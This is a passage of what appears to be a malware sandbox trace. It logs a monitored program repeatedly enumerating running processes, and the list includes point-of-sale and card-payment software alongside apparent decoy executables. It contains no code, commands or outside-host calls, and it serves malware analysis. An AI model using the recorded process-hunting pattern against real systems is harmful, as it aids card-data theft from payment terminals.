hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0176.398] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0176.401] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0176.404] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0176.407] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0176.409] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0176.412] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0176.418] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0176.421] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0176.423] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0176.426] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0176.430] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0176.432] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0176.438] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0176.440] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0176.443] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0176.446] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0176.449] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0176.451] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0176.454] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0176.463] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0176.466] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0176.468] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0176.472] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0176.474] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0176.476] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0176.479] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0176.482] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0176.484] Process32Next (in: hSnapshot=0x3a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0176.487] CloseHandle (hObject=0x3a4) returned 1 [0176.487] Sleep (dwMilliseconds=0x64) [0176.595] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f9c [0176.606] Process32First (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.608] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0176.611] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0176.612] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.614] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0176.616] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.617] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0176.619] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0176.621] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0176.623] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.625] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.627] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0176.628] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.668] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.670] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.672] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.673] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.675] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.677] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.678] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0176.680] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0176.682] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.684] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0176.687] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.689] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0176.691] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0176.694] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0176.707] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0176.710] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0176.713] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0176.809] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.812] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.814] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0176.816] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0176.819] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.821] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.823] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0176.825] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0176.827] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0176.829] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0176.832] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0176.834] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0176.895] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0176.897] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0176.900] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0176.902] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0176.950] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0176.952] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0176.960] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0176.963] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0176.965] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0176.968] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0176.971] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0176.973] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0176.975] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 